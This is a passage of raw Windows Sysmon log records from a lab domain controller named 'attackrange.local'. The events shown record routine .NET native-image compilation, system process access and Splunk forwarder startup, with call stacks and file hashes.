scorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006785Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:13.203{08A6967A-45C0-6000-AC02-000000009A01}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\11e4-0\System.ServiceModel.Routing.dll2021-01-14 13:23:13.203 10341000x80000000000000006805Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:14.969{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45C2-6000-B202-000000009A01}4552C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006804Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:14.953{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45C2-6000-B202-000000009A01}4552C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006803Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:14.953{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45C2-6000-B202-000000009A01}4552C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006802Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:14.859{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45C2-6000-B102-000000009A01}1464C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006801Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:14.843{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45C2-6000-B102-000000009A01}1464C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006800Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:14.843{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45C2-6000-B102-000000009A01}1464C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006799Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:14.765{08A6967A-45C1-6000-B002-000000009A01}3080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\c08-0\System.ServiceModel.Web.dll2021-01-14 13:23:14.765 10341000x80000000000000006818Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:15.344{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-45C3-6000-B302-000000009A01}4464C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006817Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:15.344{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006816Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:15.344{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006815Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:15.344{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006814Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:15.344{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006813Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:15.344{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006812Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:15.344{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006811Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:15.344{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006810Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:15.344{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006809Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:15.344{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006808Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:15.344{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45C3-6000-B302-000000009A01}4464C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006807Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:15.344{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-45C3-6000-B302-000000009A01}4464C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006806Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:15.203{08A6967A-45C3-6000-B302-000000009A01}4464C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006852Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.812{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-45C4-6000-B702-000000009A01}4456C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006851Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.812{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006850Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.812{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006849Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.812{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006848Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.812{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006847Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:16.812{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006846Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 